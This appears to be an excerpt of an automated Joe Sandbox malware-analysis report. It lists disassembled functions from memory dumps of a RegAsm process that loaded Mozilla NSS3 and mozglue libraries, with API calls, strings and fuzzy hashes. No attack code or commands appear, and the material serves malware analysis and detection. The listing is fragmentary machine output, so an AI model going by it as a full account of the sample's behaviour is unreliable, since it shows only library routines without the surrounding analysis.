PR_SetError.NSS3(FFFFE005,00000000), ref: 6CDD2D9C

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

PR_EnterMonitor.NSS3(?), ref: 6CDD2DB2
PR_EnterMonitor.NSS3(?), ref: 6CDD2DCF
PR_ExitMonitor.NSS3(?), ref: 6CDD2DF2
PR_ExitMonitor.NSS3(?), ref: 6CDD2E0B

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: b81202df6b04618a0bfed96852c37b2b032b81caf92af2b76342abba2f320aed
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: DB01A5F1E006009BE6309F25FC41BC7B7B5EB4131CF110439E95986B21E632F82587E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD6AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CD53090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CD6AE42), ref: 6CD530AA
Part of subcall function 6CD53090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD530C7
Part of subcall function 6CD53090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CD530E5
Part of subcall function 6CD53090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD53116
Part of subcall function 6CD53090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CD5312B
Part of subcall function 6CD53090: PK11_DestroyObject.NSS3(?,?), ref: 6CD53154
Part of subcall function 6CD53090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD5317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CD499FF,?,?,?,?,?,?,?,?,?,6CD42D6B,?), ref: 6CD6AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CD499FF,?,?,?,?,?,?,?,?,?,6CD42D6B,?), ref: 6CD6AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CD42D6B,?,?,00000000), ref: 6CD6AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CD42D6B,?,?,00000000), ref: 6CD6AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CD42D6B,?,?), ref: 6CD6AEA3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 2b357a5dfe5df84d0714ddf0fbba1cc47ec0e75489c5ce886f529e19675f70ff
Instruction ID: 82c223bea44cd00cf4d49aa135702858de57e6050f67f212d5dfeed9cbe1fc45
Opcode Fuzzy Hash: 2b357a5dfe5df84d0714ddf0fbba1cc47ec0e75489c5ce886f529e19675f70ff
Instruction Fuzzy Hash: F30186A6B4413057E701536EAC85AAF31588B8765DF080432F98DD7F22F725D919C3F2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC00D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CBC3DEF), ref: 6CC00D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CBC3DEF), ref: 6CC00D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CBC3DEF), ref: 6CC00DAF

Strings

<jemalloc>, xrefs: 6CC00D92, 6CC00DB9
: (malloc) Error in VirtualFree(), xrefs: 6CC00D97, 6CC00DBE

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 0856ca66a76c8d7bd0d7987f38ec405b179b762c9da996a9e8b6998250f9adcf
Instruction ID: ec7d5d60cb30357fe18b6998f9a779a2ddc10f90f1b2b6c50582af2eb3239bc6
Opcode Fuzzy Hash: 0856ca66a76c8d7bd0d7987f38ec405b179b762c9da996a9e8b6998250f9adcf
Instruction Fuzzy Hash: FEF08031380B5423E5142A665C16B5A276D77C2B65F36C075F644DE9C0FA61E401C675

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CE5A6D8), ref: 6CE5AE0D
free.MOZGLUE(?), ref: 6CE5AE14
DeleteCriticalSection.KERNEL32(6CE5A6D8), ref: 6CE5AE36
free.MOZGLUE(?), ref: 6CE5AE3D
free.MOZGLUE(00000000,00000000,?,?,6CE5A6D8), ref: 6CE5AE47

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 1383fdb422fd2c46a178fbfae48560a54c4454c67600492793eb0a7252659ace
Instruction ID: 367cccb220c339ae8d18e14acd0f222ce787d3b6fd6f8c91a5552ee1e2dece47
Opcode Fuzzy Hash: 1383fdb422fd2c46a178fbfae48560a54c4454c67600492793eb0a7252659ace
Instruction Fuzzy Hash: 7CF09675301A01A7CA10BF68D808957B778BF867797640329E52B83A40E732E565C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 6CC17620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CC175C4,?), ref: 6CC1762B

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CC174D7,6CC215FC,?,?,?), ref: 6CC17644
GetCurrentThreadId.KERNEL32 ref: 6CC1765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC174D7,6CC215FC,?,?,?), ref: 6CC17663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC174D7,6CC215FC,?,?,?), ref: 6CC17677

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 0101052ef45c64ef710ae0c84ef647e6f8fc5b4591a68c659b29682328e2fc3b
Instruction ID: d8034e21e3d07410208be1137c9b574d947bbdd4c41c182b56df03833f7e86bd
Opcode Fuzzy Hash: 0101052ef45c64ef710ae0c84ef647e6f8fc5b4591a68c659b29682328e2fc3b
Instruction Fuzzy Hash: 99F0AF71E10B85ABD7009F22C898A7AB778FFEA259F129356F90442601E7B0A5D08BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6CC21700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6CC21800

Part of subcall function 6CBFCBE8: GetCurrentProcess.KERNEL32(?,6CBC31A7), ref: 6CBFCBF1
Part of subcall function 6CBFCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CBC31A7), ref: 6CBFCBFA

Part of subcall function 6CBC4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC03EBD,6CC03EBD,00000000), ref: 6CBC42A9

Strings

{marker.name} - {marker.data.name}, xrefs: 6CC218C7
name, xrefs: 6CC21939
Details, xrefs: 6CC21925

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: b5d771be70860220479ac75c32cdcec275cabe8bdd40290f3079260c5941b674
Instruction ID: f18e01556d4e7b94ddc990434ac1814ab9dcb62d40159c96964cbfca214041d7
Opcode Fuzzy Hash: b5d771be70860220479ac75c32cdcec275cabe8bdd40290f3079260c5941b674
Instruction Fuzzy Hash: DE71E371A0034A9FDB04DF28D4507AAFBB1FF85314F00866DD8154BB41EB71AA99CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6CC2B0A6,6CC2B0A6,?,6CC2AF67,?,00000010,?,6CC2AF67,?,00000010,00000000,?,?,6CC2AB1F), ref: 6CC2B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6CC2B0A6,6CC2B0A6,?,6CC2AF67,?,00000010,?,6CC2AF67,?,00000010,00000000,?), ref: 6CC2B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6CC2B0A6,6CC2B0A6,?,6CC2AF67,?,00000010,?,6CC2AF67,?,00000010), ref: 6CC2B25F

Strings

map/set<T> too long, xrefs: 6CC2B1FA

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: ed193bb8e5eca90ed73580542347597ff3a38f0086617000e323f453b13aca10
Instruction ID: c8cf2f932bf5dce132784f0744c505150a6bec5aa00a79e4cf9057cfbd3707eb
Opcode Fuzzy Hash: ed193bb8e5eca90ed73580542347597ff3a38f0086617000e323f453b13aca10
Instruction Fuzzy Hash: BE618B746042458FD701CF19C890A9ABBF1FF4A318F28C599D85A8FB52E339EC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBED468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6CBFCBE8: GetCurrentProcess.KERNEL32(?,6CBC31A7), ref: 6CBFCBF1
Part of subcall function 6CBFCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CBC31A7), ref: 6CBFCBFA

EnterCriticalSection.KERNEL32(6CC4E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED4F2
LeaveCriticalSection.KERNEL32(6CC4E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED50B

Part of subcall function 6CBCCFE0: EnterCriticalSection.KERNEL32(6CC4E784), ref: 6CBCCFF6
Part of subcall function 6CBCCFE0: LeaveCriticalSection.KERNEL32(6CC4E784), ref: 6CBCD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED52E
EnterCriticalSection.KERNEL32(6CC4E7DC), ref: 6CBED690
LeaveCriticalSection.KERNEL32(6CC4E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CBFD1C5), ref: 6CBED751

Strings

MOZ_CRASH(), xrefs: 6CBED4BB

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 6ba2af62f7214af2b7ab489ea940f84ed9e1c233fbfa92e1b554771c3c2e59e4
Instruction ID: f1d7682901f8d45750cdc4b42f4fb96ae96c482d82f19156f6080f8a9bcc9a79
Opcode Fuzzy Hash: 6ba2af62f7214af2b7ab489ea940f84ed9e1c233fbfa92e1b554771c3c2e59e4
Instruction Fuzzy Hash: 5451EF71A047818FD324CF28C09071AB7F1EBC9758F15CA2ED5A9C7B85E7B0A844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CC14630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CC14721

Strings

-%llu, xrefs: 6CC14733
., xrefs: 6CC1476A
profiler-paused, xrefs: 6CC146E4

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 5a21e7587ce84e7aa269aa7df30d78a01e2d82b75a97f33cf22c8076ac4d71f5
Instruction ID: e2f6c69970c0bea5cfb873b883066f342172f9226d51e2feee53f578691b5d65
Opcode Fuzzy Hash: 5a21e7587ce84e7aa269aa7df30d78a01e2d82b75a97f33cf22c8076ac4d71f5
Instruction Fuzzy Hash: 0F414571A086089BCB08DF79E85119EBBF5EB85348F10862DE859ABB81FB309845C791

Uniqueness

Uniqueness Score: -1.00%

Function 6CC146E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CC14721

Part of subcall function 6CBC4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CC03EBD,00000017,?,00000000,?,6CC03EBD,?,?,6CBC42D2), ref: 6CBC4444

Strings

-%llu, xrefs: 6CC14733
., xrefs: 6CC1476A
profiler-paused, xrefs: 6CC146E4

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 56e6de757de62a7ec7051a4a6e343152210917ca927354b5a949fa7bd4060f87
Instruction ID: 01d8cd9d184487b9798a1ed0d6daef603c8364810dd6003640ecfc6bd9aba6e2
Opcode Fuzzy Hash: 56e6de757de62a7ec7051a4a6e343152210917ca927354b5a949fa7bd4060f87
Instruction Fuzzy Hash: E2313771F042084BCB08CF6DE89169EBBE6DB89318F15853EE8059BB81FB709904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CC1B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBC4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC03EBD,6CC03EBD,00000000), ref: 6CBC42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CC1B127), ref: 6CC1B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC1B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CC1B4E4

Strings

pid:, xrefs: 6CC1B4DE

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 6c0c106463dbd1cfbb8b7e27f0c854ec9480bb2028c513fa7aa5fd8385804f08
Instruction ID: 4efec558678f827931b997c3506af7ec762f34834b2c2f688c964b10434b6728
Opcode Fuzzy Hash: 6c0c106463dbd1cfbb8b7e27f0c854ec9480bb2028c513fa7aa5fd8385804f08
Instruction Fuzzy Hash: 963112B1A05208CBDB00DFABD890AAEB7B5BF05308F54852DD811A7F41E731A849DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CCD6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CCD6D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CCD6D20
database corruption, xrefs: 6CCD6D2A
%s at line %d of [%.10s], xrefs: 6CCD6D2F

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 3ce6a7424cea830bc03a30e71d0c3e07c5e504bcc39ea64893407279cfb40451
Instruction ID: 83131b30569ffeac99ea60a84017e15dac41b7824acab57762dc83697015e23c
Opcode Fuzzy Hash: 3ce6a7424cea830bc03a30e71d0c3e07c5e504bcc39ea64893407279cfb40451
Instruction Fuzzy Hash: 7721F130600B049BC7108E1AE841B5AB7F1BF85308F25496CD9499BB50F370F949CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE0CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CE0CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CE0CC7B), ref: 6CE0CD7A
Part of subcall function 6CE0CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CE0CD8E
Part of subcall function 6CE0CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CE0CDA5
Part of subcall function 6CE0CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CE0CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CE0CCB5
memcpy.VCRUNTIME140(6CEA14F4,6CEA02AC,00000090), ref: 6CE0CCD3
memcpy.VCRUNTIME140(6CEA1588,6CEA02AC,00000090), ref: 6CE0CD2B

Part of subcall function 6CD29AC0: socket.WSOCK32(?,00000017,6CD299BE), ref: 6CD29AE6
Part of subcall function 6CD29AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CD299BE), ref: 6CD29AFC

Part of subcall function 6CD30590: closesocket.WSOCK32(6CD29A8F,?,?,6CD29A8F,00000000), ref: 6CD30597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CE0CCB0

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: f42a6bf4d9f6c581896bd388ce05e33de7463b1fa89c4810917468faf1a2ca9e
Instruction ID: cce1b2debb1cb11d17af0b8b2351ce878f6c955f1366d1c6141e0750b67712ad
Opcode Fuzzy Hash: f42a6bf4d9f6c581896bd388ce05e33de7463b1fa89c4810917468faf1a2ca9e
Instruction Fuzzy Hash: 4F1163F6B00250DFDB009FE9E84774A3AB89756618F742129E50ACBB41E772C4258BE6

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CC0E577
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0E584
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC0E8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6CC0E5A1, 6CC0E5CC, 6CC0E5FF, 6CC0E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CC0E722, 6CC0E750, 6CC0E7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CC0E655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CC0E777
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CC0E826, 6CC0E850

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
